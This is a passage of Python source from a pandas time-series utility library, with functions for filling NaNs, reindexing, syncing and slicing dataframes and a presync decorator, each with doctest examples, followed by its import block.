>>> b = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-99), list('bcdef'))
>>> assert list(df_columns([a,b])) == list('bcde')
>>> assert list(df_columns([a,b], 'oj')) == list('abcdef')
>>> assert list(df_columns([a,b], 'lj')) == list('abcde')
>>> assert list(df_columns([a,b], 'rj')) == list('bcdef')
:Parameters:
----------
seq : sequence of dataframes
DESCRIPTION.
index : str, optional
how to inner-join. The default is 'inner'.
:Returns:
-------
pd.Index
list of columns.
"""
listed = _list(seq)
indexes= [ts.columns for ts in listed if is_df(ts) and ts.shape[1]>1 and len(set(ts.columns)) == ts.shape[1]] #dataframe with non-unique columns are treated like arrays
if len(indexes):
return _df_index(indexes, index)
arrs = [ts.shape[1] for ts in listed if (is_arr(ts) or is_df(ts)) and len(ts.shape)>1 and ts.shape[1]>1]
if len(arrs):
return _np_index(arrs, index)
return None
@loop(list, tuple, dict)
def _df_fillna(df, method = None, axis = 0, limit = None):
methods = as_list(method)
if len(methods) == 0:
return df
if is_arr(df):
return df_fillna(pd.DataFrame(df) if len(df.shape)==2 else pd.Series(df), method, axis, limit).values
res = df
for m in methods:
if is_num(m):
res = res.fillna(value = m, axis = axis, limit = limit)
elif m in ['backfill', 'bfill', 'pad', 'ffill']:
res = res.fillna(method = m, axis = axis, limit = limit)
elif m in ('fnna', 'nona'):
nonan = ~np.isnan(res)
if len(res.shape)==2:
nonan = nonan.max(axis=1)
if m == 'fnna':
nonan = nonan[nonan.values]
if len(nonan):
res = res[nonan.index[0]:]
else:
res = res.iloc[:0]
elif m == 'nona':
res = res[nonan.values]
else:
if is_num(limit) and limit<0:
res = res.interpolate(method = m, axis = axis, limit = abs(limit),
limit_direction = 'backward')
else:
res = res.interpolate(method = m, axis = axis, limit = limit)
return res
def df_fillna(df, method = None, axis = 0, limit = None):
"""
Equivelent to df.fillna() except:
- support np.ndarray as well as dataframes
- support multiple methods of filling/interpolation
- supports removal of nan from the start/all of the timeseries
- supports action on multiple timeseries
:Parameters:
----------------
df : dataframe/numpy array
method : string, list of strings or None, optional
Either a fill method (bfill, ffill, pad)
Or an interplation method: 'linear', 'time', 'index', 'values', 'nearest', 'zero', 'slinear', 'quadratic', 'cubic', 'barycentric', 'krogh', 'spline', 'polynomial', 'from_derivatives', 'piecewise_polynomial', 'pchip', 'akima', 'cubicspline'
Or 'fnna': removes all to the first non nan
Or 'nona': removes all nans
axis : int, optional
axis. The default is 0.
limit : TYPE, optional
when filling, how many nan get filled. The default is None (indefinite)
:Example: method ffill or bfill
-----------------------------------------------
>>> from pyg import *; import numpy as np
>>> df = np.array([np.nan, 1., np.nan, 9, np.nan, 25])
>>> assert eq(df_fillna(df, 'ffill'), np.array([ np.nan, 1., 1., 9., 9., 25.]))
>>> assert eq(df_fillna(df, ['ffill','bfill']), np.array([ 1., 1., 1., 9., 9., 25.]))
>>> assert eq(df_fillna(df, ['ffill','bfill']), np.array([ 1., 1., 1., 9., 9., 25.]))
>>> df = np.array([np.nan, 1., np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, 9, np.nan, 25])
>>> assert eq(df_fillna(df, 'ffill', limit = 2), np.array([np.nan, 1., 1., 1., np.nan, np.nan, np.nan, np.nan, 9., 9., 25.]))
df_fillna does not maintain state of latest 'prev' value: use ffill_ for that.
:Example: interpolation methods
-----------------------------------------------
>>> from pyg import *; import numpy as np
>>> df = np.array([np.nan, 1., np.nan, 9, np.nan, 25])
>>> assert eq(df_fillna(df, 'linear'), np.array([ np.nan, 1., 5., 9., 17., 25.]))
>>> assert eq(df_fillna(df, 'quadratic'), np.array([ np.nan, 1., 4., 9., 16., 25.]))
:Example: method = fnna and nona
---------------------------------------------
>>> from pyg import *; import numpy as np
>>> ts = np.array([np.nan] * 10 + [1.] * 10 + [np.nan])
>>> assert eq(df_fillna(ts, 'fnna'), np.array([1.]*10 + [np.nan]))
>>> assert eq(df_fillna(ts, 'nona'), np.array([1.]*10))
>>> assert len(df_fillna(np.array([np.nan]), 'nona')) == 0
>>> assert len(df_fillna(np.array([np.nan]), 'fnna')) == 0
:Returns:
-------
array/dataframe with nans removed/filled
"""
return _df_fillna(df, method = method, axis = axis, limit = limit)
@loop(dict, list, tuple)
def _nona(df, value = np.nan):
if np.isnan(value):
mask = np.isnan(df)
elif np.isinf(value):
mask = np.isinf(df)
else:
mask = df == value
if len(mask.shape) == 2:
mask = mask.min(axis=1) == 1
return df[~mask]
def nona(a, value = np.nan):
"""
removes rows that are entirely nan (or a specific other value)
:Parameters:
----------------
a : dataframe/ndarray
value : float, optional
value to be removed. The default is np.nan.
:Example:
----------
>>> from pyg import *
>>> a = np.array([1,np.nan,2,3])
>>> assert eq(nona(a), np.array([1,2,3]))
:Example: multiple columns
---------------------------
>>> a = np.array([[1,np.nan,2,np.nan], [np.nan, np.nan, np.nan, 3]]).T
>>> b = np.array([[1,2,np.nan], [np.nan, np.nan, 3]]).T ## 2nd row has nans across
>>> assert eq(nona(a), b)
"""
return _nona(a)
@loop(list, tuple, dict)
def _df_reindex(ts, index, method = None, limit = None):
methods = as_list(method)
if is_pd(ts):
if is_int(index):
raise ValueError('trying to reindex dataframe %s using numpy interval length %i'%(ts, index))
if len(methods) and methods[0] in ['backfill', 'bfill', 'pad', 'ffill']:
res = _nona(ts).reindex(index, method = methods[0], limit = limit)
res = _df_fillna(res, method = methods[1:], limit = limit)
else:
res = ts.reindex(index)
res = _df_fillna(res, method = method, limit = limit)
return res
elif is_arr(ts):
if isinstance(index, pd.Index):
if len(index) == len(ts):
return ts
else:
raise ValueError('trying to reindex numpy array %s using pandas index %s'%(ts, index))
elif is_int(index):
if index<len(ts):
res = ts[-index:]
elif index>len(ts):
shape = (index - len(ts),) + ts.shape[1:]
res = np.concatenate([np.full(shape, np.nan),ts])
else:
res = ts
return df_fillna(res, method = methods, limit = limit)
else:
return ts
else:
return ts
@loop(list, tuple, dict)
def _df_recolumn(ts, columns):
if columns is not None and is_df(ts) and ts.shape[1] > 1 and len(set(ts.columns)) == ts.shape[1]:
return pd.DataFrame({col: ts[col].values if col in ts.columns else np.nan for col in columns}, index = ts.index)
else:
return ts
def df_recolumn(ts, columns = None):
return _df_recolumn(ts, columns)
def np_reindex(ts, index, columns = None):
"""
pyg assumes that when working with numpy arrays representing timeseries, you:
- determine a global timestamp
- resample all timeseries to that one, and then covert to numpy.array, possibly truncating leading nan's.
- do the maths you need to do
- having worked with numpy arrays, if we want to reindex them back into dataframe, use np_reindex
:Example:
-------
>>> from pyg import *
>>> ts = np.array(np.random.normal(0,1,1000))
>>> index = pd.Index(drange(-1999))
>>> np_reindex(ts, index)
:Parameters:
----------------
ts : numpy array
index : pandas.Index
columns: list/array of columns names
:Returns:
----------
pd.DataFrame/pd.Series
"""
if is_pd(index):
index = index.index
if len(index)>len(ts):
index = index[-len(ts):]
elif len(index)<len(ts):
ts = ts[-len(index):]
res = pd.Series(ts, index) if len(ts.shape)<2 else pd.DataFrame(ts, index)
if columns is not None:
if is_df(columns):
columns = columns.columns
res.columns = columns
return res
def df_reindex(ts, index = None, method = None, limit = None):
"""
A slightly more general version of df.reindex(index)
:Parameters:
----------------
ts : dataframe or numpy array (or list/dict of theses)
timeseries to be reindexed
index : str, timeseries, pd.Index.
The new index
method : str, list of str, float, optional
various methods of handling nans are available. The default is None.
See df_fillna for a full list.
:Returns:
-------
timeseries/np.ndarray (or list/dict of theses)
timeseries reindex.
:Example: index = inner/outer
-----------------------------
>>> tss = [pd.Series(np.random.normal(0,1,10), drange(-i, 9-i)) for i in range(5)]
>>> res = df_reindex(tss, 'inner')
>>> assert len(res[0]) == 6
>>> res = df_reindex(tss, 'outer')
>>> assert len(res[0]) == 14
:Example: index provided
-----------------------------
>>> tss = [pd.Series(np.random.normal(0,1,10), drange(-i, 9-i)) for i in range(5)]
>>> res = df_reindex(tss, tss[0])
>>> assert eq(res[0], tss[0])
>>> res = df_reindex(tss, tss[0].index)
>>> assert eq(res[0], tss[0])
"""
if index is None:
return ts
elif is_str(index):
index = df_index(ts, index)
elif is_ts(index):
index = index.index
elif is_arr(index):
index = pd.Index(index)
return _df_reindex(ts, index = index, method = method, limit = limit)
def df_concat(objs, columns = None, axis=1, join = 'outer'):
"""
simple concatenator,
- defaults to to concatenating by date (for timeseries)
- supports columns renaming
:Parameters:
----------
objs : list/dict
collection of timeseries
columns : str/list
Names of new columns. The default is None.
axis : int, optional
axis to merge. The default is 1.
join : str, optional
join method inner/outer, see pd.concat. The default is 'outer'.
:Returns:
-------
res : pd.DataFrame
joined dataframe
:Example:
---------
>>> objs = [pd.Series([1,2,3], [4,5,6]), pd.Series([3,4,5], [1,2,4])]
>>> columns = ['a', 'b'];
>>> axis = 1; join = 'outer'
>>> res = df_concat(objs, columns)
>>> res
>>> a b
>>> 1 NaN 3.0
>>> 2 NaN 4.0
>>> 4 1.0 5.0
>>> 5 2.0 NaN
>>> 6 3.0 NaN
>>> df_concat(res, dict(a = 'x', b = 'y'))
>>> res
>>> x y
>>> 1 NaN 3.0
>>> 2 NaN 4.0
>>> 4 1.0 5.0
>>> 5 2.0 NaN
>>> 6 3.0 NaN
"""
if isinstance(objs, dict):
columns = list(objs.keys())
objs = list(objs.values())
if isinstance(objs, list):
df_objs = [o for o in objs if is_pd(o)]
res = pd.concat(df_objs, axis = axis, join = join)
if len(df_objs) < len(objs):
df_objs = [o if is_pd(o) else pd.Series(o, res.index) for o in objs]
res = pd.concat(df_objs, axis = axis, join = join)
elif isinstance(objs, pd.DataFrame):
res = objs.copy() if columns is not None else objs
if columns is not None:
if isinstance(columns, list):
res.columns = columns
else:
res = res.rename(columns = columns)
return res
@loop(list, dict, tuple)
def _df_column(ts, column, i = None, n = None):
"""
This is mostly a helper function to help us loop through multiple columns.
Function grabs a column from a dataframe/2d array
:Parameters:
----------
ts : datafrane
the original dataframe or 2-d numpy array
column : str
name of the column to grab.
i : int, optional
Can grab the column using its index. The default is None.
n : int, optional
asserting the number of columns, ts.shape[1]. The default is None.
:Returns:
-------
a series or a 1-d numpy array
"""
if is_df(ts):
if ts.shape[1] == 1:
return ts[ts.columns[0]]
elif column in ts.columns:
return ts[column]
elif column is None and i is not None:
if len(set(ts.columns)) == ts.shape[1]: #unique columns, don't call me using i
raise ValueError('trying to grab %ith column from a dataframe with proper columns: %s'%(i, ts.columns))
elif n is not None and ts.shape[1]!=n:
raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
else:
if i<ts.shape[1]:
return ts.iloc[:,i]
else:
return np.nan
else:
return np.nan
elif is_arr(ts) and len(ts.shape) == 2:
if ts.shape[1] == 1:
return ts.T[0]
elif i is not None:
if n is not None and ts.shape[1]!=n:
raise ValueError('trying to grab %ith column and asserting must have %i columns but have %i'%(i, n, ts.shape[1]))
elif i<ts.shape[1]:
return ts.T[i]
else:
return np.nan
else:
return ts
else:
return ts
def df_column(ts, column, i = None, n = None):
"""
This is mostly a helper function to help us loop through multiple columns.
Function grabs a column from a dataframe/2d array
:Parameters:
----------
ts : datafrane
the original dataframe or 2-d numpy array
column : str
name of the column to grab.
i : int, optional
Can grab the column using its index. The default is None.
n : int, optional
asserting the number of columns, ts.shape[1]. The default is None.
:Returns:
-------
a series or a 1-d numpy array
"""
return _df_column(ts = ts, column = column, i = i, n = n)
def _convert(res, columns):
"""
We run a result per each column, now we want to convert it back to objects
----------
res : dict
results run per each column.
"""
values = list(res.values())
if is_tss(values):
return pd.DataFrame(res)
elif is_arrs(values) and is_int(columns):
return np.array(values).T
elif is_tuples(values):
return tuple([_convert(dict(zip(res.keys(), row)), columns) for row in zipper(*values)])
else:
return np.array(values) if is_int(columns) else pd.Series(res)
def df_sync(dfs, join = 'ij', method = None, columns = 'ij'):
"""
df_sync performs a sync of multiple dataframes
:Parameters:
----------
dfs : list or dict of timeseries
dataframes to be synched
join : str, optional
index join method. The default is 'ij'.
method : str/float, optional
how the nan's are to be filled once reindexing occurs. The default is None.
columns : str, optional
how to sync multi-column timeseries. The default is 'ij'.
:Example:
-------
>>> a = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-100,-1), list('abcde'))
>>> b = pd.DataFrame(np.random.normal(0,1,(100,5)), drange(-99), list('bcdef'))
>>> c = 'not a timeseries'
>>> d = pd.DataFrame(np.random.normal(0,1,(100,1)), drange(-98,1), ['single_column_df'])
>>> s = pd.Series(np.random.normal(0,1,105), drange(-104))
:Example: inner join on index and columns
--------------------------------
>>> dfs = [a,b,c,d,s]
>>> join = 'ij'; method = None; columns = 'ij'
>>> res = df_sync(dfs, 'ij')
>>> assert len(res[0]) == len(res[1]) == len(res[-1]) == 98
>>> assert res[2] == 'not a timeseries'
>>> assert list(res[0].columns) == list('bcde')
:Example: outer join on index and inner join on columns
--------------------------------
>>> res = df_sync(dfs, join = 'oj')
>>> assert len(res[0]) == len(res[1]) == len(res[-1]) == 106; assert res[2] == 'not a timeseries'
>>> assert list(res[0].columns) == list('bcde')
>>> res = df_sync(dfs, join = 'oj', method = 1)
>>> assert res[0].iloc[0].sum() == 4
:Example: outer join on index and columns
-------------------------------------------
>>> res = df_sync(dfs, join = 'oj', method = 1, columns = 'oj')
>>> assert res[0].iloc[0].sum() == 5
>>> assert list(res[0].columns) == list('abcdef')
>>> assert list(res[-2].columns) == ['single_column_df'] # single column unaffected
:Example: synching of dict rather than a list
-------------------------------------------
>>> dfs = Dict(a = a, b = b, c = c, d = d, s = s)
>>> res = df_sync(dfs, join = 'oj', method = 1, columns = 'oj')
>>> assert res.c == 'not a timeseries'
>>> assert res.a.shape == (106,6)
"""
if isinstance(dfs, dict):
values = list(dfs.values())
elif isinstance(dfs, (list, tuple)):
values = list(dfs)
else:
return dfs
listed = _list(values)
tss = [ts for ts in listed if is_ts(ts)]
index = df_index(listed, join)
dfs = df_reindex(dfs, index, method = method)
### now we do the columns
if columns is False or columns is None:
return dfs
else:
cols = df_columns(tss, columns)
dfs = df_recolumn(dfs, cols)
return dfs
class presync(wrapper):
"""
Much of timeseries analysis in Pandas is spent aligning multiple timeseries before feeding them into a function.
presync allows easy presynching of all paramters of a function.
:Parameters:
----------
function : callable, optional
function to be presynched. The default is None.
index : str, optional
index join policy. The default is 'inner'.
method : str/int/list of these, optional
method of nan handling. The default is None.
columns : str, optional
columns join policy. The default is 'inner'.
default : float, optional
value when no data is available. The default is np.nan.
:Returns:
-------
presynch-decorated function
:Example:
-------
>>> from pyg import *
>>> x = pd.Series([1,2,3,4], drange(-3))
>>> y = pd.Series([1,2,3,4], drange(-4,-1))
>>> z = pd.DataFrame([[1,2],[3,4]], drange(-3,-2), ['a','b'])
>>> addition = lambda a, b: a+b
#We get some nonsensical results:
>>> assert list(addition(x,z).columns) == list(x.index) + ['a', 'b']
#But:
>>> assert list(presync(addition)(x,z).columns) == ['a', 'b']
>>> res = presync(addition, index='outer', method = 'ffill')(x,z)
>>> assert eq(res.a.values, np.array([2,5,6,7]))
:Example 2: alignment works for parameters 'buried' within...
-------------------------------------------------------
>>> function = lambda a, b: a['x'] + a['y'] + b
>>> f = presync(function, 'outer', method = 'ffill')
>>> res = f(dict(x = x, y = y), b = z)
>>> assert eq(res, pd.DataFrame(dict(a = [np.nan, 4, 8, 10, 11], b = [np.nan, 5, 9, 11, 12]), index = drange(-4)))
:Example 3: alignment of numpy arrays
-------------------------------------
>>> addition = lambda a, b: a+b
>>> a = presync(addition)
>>> assert eq(a(pd.Series([1,2,3,4], drange(-3)), np.array([[1,2,3,4]]).T), pd.Series([2,4,6,8], drange(-3)))
>>> assert eq(a(pd.Series([1,2,3,4], drange(-3)), np.array([1,2,3,4])), pd.Series([2,4,6,8], drange(-3)))
>>> assert eq(a(pd.Series([1,2,3,4], drange(-3)), np.array([[1,2,3,4],[5,6,7,8]]).T), pd.DataFrame({0:[2,4,6,8], 1:[6,8,10,12]}, drange(-3)))
>>> assert eq(a(np.array([1,2,3,4]), np.array([[1,2,3,4]]).T), np.array([2,4,6,8]))
:Example 4: inner join alignment of columns in dataframes by default
---------------------------------------------------------------------
>>> x = pd.DataFrame({'a':[2,4,6,8], 'b':[6,8,10,12.]}, drange(-3))
>>> y = pd.DataFrame({'wrong':[2,4,6,8], 'columns':[6,8,10,12]}, drange(-3))
>>> assert len(a(x,y)) == 0
>>> y = pd.DataFrame({'a':[2,4,6,8], 'other':[6,8,10,12.]}, drange(-3))
>>> assert eq(a(x,y),x[['a']]*2)
>>> y = pd.DataFrame({'a':[2,4,6,8], 'b':[6,8,10,12.]}, drange(-3))
>>> assert eq(a(x,y),x*2)
>>> y = pd.DataFrame({'column name for a single column dataframe is ignored':[1,1,1,1]}, drange(-3))
>>> assert eq(a(x,y),x+1)
>>> a = presync(addition, columns = 'outer')
>>> y = pd.DataFrame({'other':[2,4,6,8], 'a':[6,8,10,12]}, drange(-3))
>>> assert sorted(a(x,y).columns) == ['a','b','other']
:Example 4: ffilling, bfilling
------------------------------
>>> x = pd.Series([1.,np.nan,3.,4.], drange(-3))
>>> y = pd.Series([1.,np.nan,3.,4.], drange(-4,-1))
>>> assert eq(a(x,y), pd.Series([np.nan, np.nan,7], drange(-3,-1)))
but, we provide easy conversion of internal parameters of presync:
>>> assert eq(a.ffill(x,y), pd.Series([2,4,7], drange(-3,-1)))
>>> assert eq(a.bfill(x,y), pd.Series([4,6,7], drange(-3,-1)))
>>> assert eq(a.oj(x,y), pd.Series([np.nan, np.nan, np.nan, 7, np.nan], drange(-4)))
>>> assert eq(a.oj.ffill(x,y), pd.Series([np.nan, 2, 4, 7, 8], drange(-4)))
:Example 5: indexing to a specific index
----------------------------------------
>>> index = pd.Index([dt(-3), dt(-1)])
>>> a = presync(addition, index = index)
>>> x = pd.Series([1.,np.nan,3.,4.], drange(-3))
>>> y = pd.Series([1.,np.nan,3.,4.], drange(-4,-1))
>>> assert eq(a(x,y), pd.Series([np.nan, 7], index))
:Example 6: returning complicated stuff
----------------------------------------
>>> from pyg import *
>>> a = pd.DataFrame(np.random.normal(0,1,(100,10)), drange(-99))
>>> b = pd.DataFrame(np.random.normal(0,1,(100,10)), drange(-99))
>>> def f(a, b):
>>> return (a*b, ts_sum(a), ts_sum(b))
>>> old = f(a,b)
>>> self = presync(f)
>>> args = (); kwargs = dict(a = a, b = b)
>>> new = self(*args, **kwargs)
>>> assert eq(new, old)
"""
def __init__(self, function = None, index = 'inner', method = None, columns = 'inner', default = np.nan):
super(presync, self).__init__(function = function, index = index, method = method, columns = columns , default = default)
@property
def ij(self):
return copy(self) + dict(index = 'inner')
@property
def oj(self):
return self + dict(index = 'outer')
@property
def lj(self):
return self + dict(index = 'left')
@property
def rj(self):
return self + dict(index = 'right')
@property
def ffill(self):
return copy(self) + dict(method = 'ffill')
@property
def bfill(self):
return self + dict(method = 'bfill')
def wrapped(self, *args, **kwargs):
_idx = kwargs.pop('join', self.index)
_method = kwargs.pop('method', self.method)
_columns = kwargs.pop('columns', self.columns)
values = list(args) + list(kwargs.values())
listed = _list(values)
tss = [ts for ts in listed if is_ts(ts)]
callargs = inspect.getcallargs(self.function, *args, **kwargs)
if is_str(_idx) and _idx in callargs:
index = _index(callargs[_idx])
else:
index = df_index(listed, _idx)
args_= df_reindex(args, index, method = _method)
kwargs_= df_reindex(kwargs, index, method = _method)
### now we do the columns
if _columns is False:
return self.function(*args_, **kwargs_)
else:
cols = [tuple(ts.columns) for ts in tss if is_df(ts) and ts.shape[1]>1]
if len(set(cols))==1: # special case where all 2-d dataframes have same column headers
columns = cols[0]
n = len(columns)
res = {column: self.function(*df_column(args_,column = column, i = i, n = n), **df_column(kwargs_, column=column, i = i, n = n)) for i, column in enumerate(columns)}
else:
columns = df_columns(listed, _columns)
if is_int(columns):
res = {i: self.function(*df_column(args_, column = None, i = i), **df_column(kwargs_, column=None, i = i)) for i in range(columns)}
elif columns is None:
return self.function(*df_column(args_, column = None), **df_column(kwargs_, column = None))
else:
columns = list(columns) if isinstance(columns, pd.Index) else as_list(columns)
columns = sorted(columns)
res = {column: self.function(*df_column(args_,column = column), **df_column(kwargs_, column=column)) for column in columns}
converted = _convert(res, columns)
return converted
@presync
def _div_(a, b):
"""
division of a by b supporting presynching (inner join) of timeseries
"""
return a/b
@presync
def _sub_(a, b):
"""
subtraction of b from a supporting presynching (inner join) of timeseries
"""
return a-b
@presync
def _add_(a, b):
"""
addition of a and b supporting presynching (inner join) of timeseries
"""
return a + b
@presync
def _mul_(a, b):
"""
multiplication of b and a supporting presynching (inner join) of timeseries
"""
return a * b
@presync
def _pow_(a, b):
"""
equivalent to a**b supporting presynching (inner join) of timeseries
"""
return a**b
def add_(a, b = None, join = 'ij', method = None, columns = 'ij'):
"""
a = pd.Series([1,2,3], drange(-2))
b = pd.Series([1,2,3], drange(-3,-1))
add_(a,b, 'oj', method = 0)
addition of a and b supporting presynching (inner join) of timeseries
"""
dfs = as_list(a) + as_list(b)
f = lambda a, b: _add_(a, b, join = join, method = method, columns = columns)
return reducer(f, dfs)
def mul_(a, b = None, join = 'ij', method = None, columns = 'ij'):
"""
multiplication of a and b supporting presynching (inner join) of timeseries
mul_(a,b,join = 'oj', method = 'ffill')
cell(mul_, a = a, b = b, join = 'oj')()
"""
dfs = as_list(a) + as_list(b)
f = lambda a, b: _mul_(a, b, join = join, method = method, columns = columns)
return reducer(f, dfs)
def div_(a, b, join = 'ij', method = None, columns = 'ij'):
"""
division of a by b supporting presynching (inner join) of timeseries
"""
if isinstance(a, list):
a = mul_(a, join = join, method = method, columns = columns)
if isinstance(b, list):
b = mul_(b, join = join, method = method, columns = columns)
return _div_(a, b, join = join, method = method, columns = columns)
def sub_(a, b, join = 'ij', method = None, columns = 'ij'):
"""
subtraction of b from a supporting presynching (inner join) of timeseries
"""
if isinstance(a, list):
a = add_(a, join = join, method = method, columns = columns)
if isinstance(b, list):
b = add_(b, join = join, method = method, columns = columns)
return _sub_(a, b, join = join, method = method, columns = columns)
def pow_(a, b, join = 'ij', method = None, columns = 'ij'):
"""
equivalent to a**b supporting presynching (inner join) of timeseries
"""
return _pow_(a,b, join = join, method = method, columns = columns)
def min_(a, b = None, join = 'ij', method = None, columns = 'ij'):
"""
equivalent to redced np.minimum operation supporting presynching of timeseries
"""
dfs = as_list(a) + as_list(b)
dfs = df_sync(dfs, join = join, method = method, columns = columns)
return reducer(np.minimum, dfs)
def max_(a, b = None, join = 'ij', method = None, columns = 'ij'):
"""
equivalent to redced np.minimum operation supporting presynching of timeseries
"""
dfs = as_list(a) + as_list(b)
dfs = df_sync(dfs, join = join, method = method, columns = columns)
return reducer(np.maximum, dfs)
def _closed(oc):
if oc in '()oO':
return False
elif oc in '[]cC':
return True
else:
raise ValueError('not sure how to parse boundary %s'%oc)
def _df_slice(df, lb = None, ub = None, openclose = '[)'):
"""
Performs a one-time slice of the dataframe. Does not stich slices together
pandas slices has two issues:
1) it fails for timeseries quite a but
2) for timeseries df[dt1:dt2] is close-close while for normal dataframe df[lb,ub] is close-open
"""
if isinstance(df, (pd.Index, pd.Series, pd.DataFrame)) and len(df)>0 and (ub is not None or lb is not None):
l,u = openclose if openclose else '[)'
l = _closed(l); u = _closed(u)
if is_ts(df):
lb = lb if lb is None or isinstance(lb, datetime.time) else dt(lb)
ub = ub if ub is None or isinstance(ub, datetime.time) else dt(ub)
if (l or lb is None) and (u or ub is None):
try:
return df[lb:ub]
except Exception:
pass
elif (l or lb is None) and (ub is None or not u):
try:
return df[lb:ub]
except Exception:
pass
if lb is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(lb, datetime.time):
index = index.time
df = df[index>=lb] if l else df[index>lb]
if ub is not None:
index = df if isinstance(df, pd.Index) else df.index
if isinstance(ub, datetime.time):
index = index.time
df = df[index<=ub] if u else df[index<ub]
return df
def df_slice(df, lb = None, ub = None, openclose = '(]', n = 1):
"""
slices a dataframe/series/index based on lower/upper bounds.
If multiple timeseries are sliced at different times, will then stitch them together.
:Parameters:
----------
df : dataframe
Either a single dataframe or a list of dataframes.
lb : single or multiple lower bounds
lower bounds to cut the data.
ub : single or multiple upper bounds
upper bounds to cut the data
openclose : 2-character string
defines how left/right boundary behave.
[,] or c : close
(,) or o : open
' ' : do not cut
:Returns:
-------
filtered (and possibly stictched) timeseries
:Example: single timeseries filtering
---------
>>> df = pd.Series(np.random.normal(0,1,1000), drange(-999))
>>> df_slice(df, None, '-1m')
>>> df_slice(df, '-1m', None)
:Example: single timeseries, multiple filtering
---------
>>> df = pd.Series(np.random.normal(0,1,1000), drange(-999))
>>> lb = jan1 = drange(2018, None, '1y')
>>> ub = feb1 = drange(dt(2018,2,1), None, '1y')
>>> assert set(df_slice(df, jan1, feb1).index.month) == {1}
:Example: single timeseries time of day filtering
---------
>>> dates = drange(-5, 0, '5n')
>>> df = pd.Series(np.random.normal(0,1,12*24*5+1), dates)
>>> assert len(df_slice(df, None, datetime.time(hour = 10))) == 606
>>> assert len(df_slice(df, datetime.time(hour = 5), datetime.time(hour = 10))) == 300
>>> assert len(df_slice(df, lb = datetime.time(hour = 10), ub = datetime.time(hour = 5))) == len(dates) - 300
:Example: stitching together multiple future contracts for a continuous price
---------
>>> ub = drange(1980, 2000, '3m')
>>> df = [pd.Series(np.random.normal(0,1,1000), drange(-999, date)) for date in ub]
>>> df_slice(df, ub = ub)
:Example: stitching together multiple future contracts for a continuous price in front 5 contracts
---------
>>> ub = drange(1980, 2000, '3m')
>>> df = [pd.Series(np.random.normal(0,1,1000), drange(-999, date)) for date in ub]
>>> df_slice(df, ub = ub, n = 5).iloc[500:]
:Example: stitching together symbols
---------
>>> from pyg import *
>>> ub = drange(1980, 2000, '3m')
>>> df = loop(list)(dt2str)(ub)
>>> df_slice(df, ub = ub, n = 3)
"""
if isinstance(lb, tuple) and len(lb) == 2 and ub is None:
lb, ub = lb
if isinstance(ub, datetime.time) and isinstance(lb, datetime.time) and lb>ub:
pre = df_slice(df, None, ub)
post = df_slice(df, lb, None)
return pd.concat([pre, post]).sort_index()
if isinstance(df, list):
if isinstance(lb, list) and ub is None:
ub = lb[1:] + [None]
elif isinstance(ub, list) and lb is None:
lb = [None] + ub[:-1]
boundaries = sorted(set([date for date in lb + ub if date is not None]))
df = [d if is_pd(d) else pd.Series(d, boundaries) for d in df]
if n > 1:
df = [pd.concat(df[i: i+n], axis = 1) for i in range(len(df))]
for d in df:
d.columns = range(d.shape[1])
dfs = as_list(df)
dlu = zipper(dfs, lb, ub)
res = [_df_slice(d, lb = l, ub = u, openclose = openclose) for d, l, u in dlu]
if len(res) == 0:
return None
elif len(res) == 1:
return res[0]
elif isinstance(lb, list) and isinstance(ub, list):
res = pd.concat(res)
return res
def df_unslice(df, ub):
"""
If we have a rolled multi-column timeseries, and we want to know where each timeseries is originally associated with.
As long as you provide the stiching points, forming the upper bound of each original timeseries,
df_unslice will return a dict from each upper bound to a single-column timeseries
:Example:
---------
>>> ub = drange(1980, 2000, '3m')
>>> dfs = [pd.Series(date.year * 100 + date.month, drange(-999, date)) for date in ub]
>>> df = df_slice(dfs, ub = ub, n = 10)
>>> df.iloc[700:-700:]
>>> 0 1 2 3 4 5 6 7 8 9
>>> 1979-03-08 198001.0 198004.0 198007.0 198010.0 198101.0 198104.0 198107.0 198110.0 NaN NaN
>>> 1979-03-09 198001.0 198004.0 198007.0 198010.0 198101.0 198104.0 198107.0 198110.0 NaN NaN
>>> 1979-03-10 198001.0 198004.0 198007.0 198010.0 198101.0 198104.0 198107.0 198110.0 NaN NaN
>>> 1979-03-11 198001.0 198004.0 198007.0 198010.0 198101.0 198104.0 198107.0 198110.0 NaN NaN
>>> 1979-03-12 198001.0 198004.0 198007.0 198010.0 198101.0 198104.0 198107.0 198110.0 NaN NaN
>>> ... ... ... ... ... ... ... ... .. ..
>>> 1998-01-27 199804.0 199807.0 199810.0 199901.0 199904.0 199907.0 199910.0 200001.0 NaN NaN
>>> 1998-01-28 199804.0 199807.0 199810.0 199901.0 199904.0 199907.0 199910.0 200001.0 NaN NaN
>>> 1998-01-29 199804.0 199807.0 199810.0 199901.0 199904.0 199907.0 199910.0 200001.0 NaN NaN
>>> 1998-01-30 199804.0 199807.0 199810.0 199901.0 199904.0 199907.0 199910.0 200001.0 NaN NaN
>>> 1998-01-31 199804.0 199807.0 199810.0 199901.0 199904.0 199907.0 199910.0 200001.0 NaN NaN
>>> res = df_unslice(df, ub)
>>> res[ub[0]]
>>> 1977-04-07 198001.0
>>> 1977-04-08 198001.0
>>> 1977-04-09 198001.0
>>> 1977-04-10 198001.0
>>> 1977-04-11 198001.0
>>> ...
>>> 1979-12-28 198001.0
>>> 1979-12-29 198001.0
>>> 1979-12-30 198001.0
>>> 1979-12-31 198001.0
>>> 1980-01-01 198001.0
>>> Name: 0, Length: 1000, dtype: float64
We can then even slice the data again:
>>> assert eq(df_slice(list(res.values()), ub = ub, n = 10), df)
"""
n = df.shape[1] if is_df(df) else 1
res = dictable(ub = ub, lb = [None] + ub[:-1], i = range(len(ub)))
res = res(ts = lambda lb, ub: df_slice(df, lb, ub, '(]'))
res = res(rs = lambda i, ts: dictable(u = ub[i: i+n], j = range(len(ub[i: i+n])))(ts = lambda j: ts[j]))
rs = dictable.concat(res.rs).listby('u').do([pd.concat, nona], 'ts')
return dict(rs['u', 'ts'])
| 36.134328
| 247
| 0.551449
|
from pyg_base._types import is_df, is_str, is_num, is_tss, is_int, is_arr, is_ts, is_arrs, is_tuples, is_pd
from pyg_base._dictable import dictable
from pyg_base._as_list import as_list
from pyg_base._zip import zipper
from pyg_base._reducer import reducing, reducer
from pyg_base._decorators import wrapper
from pyg_base._loop import loop
from pyg_base._dates import dt
import pandas as pd
import numpy as np
from copy import copy
import inspect
import datetime
from operator import add, mul
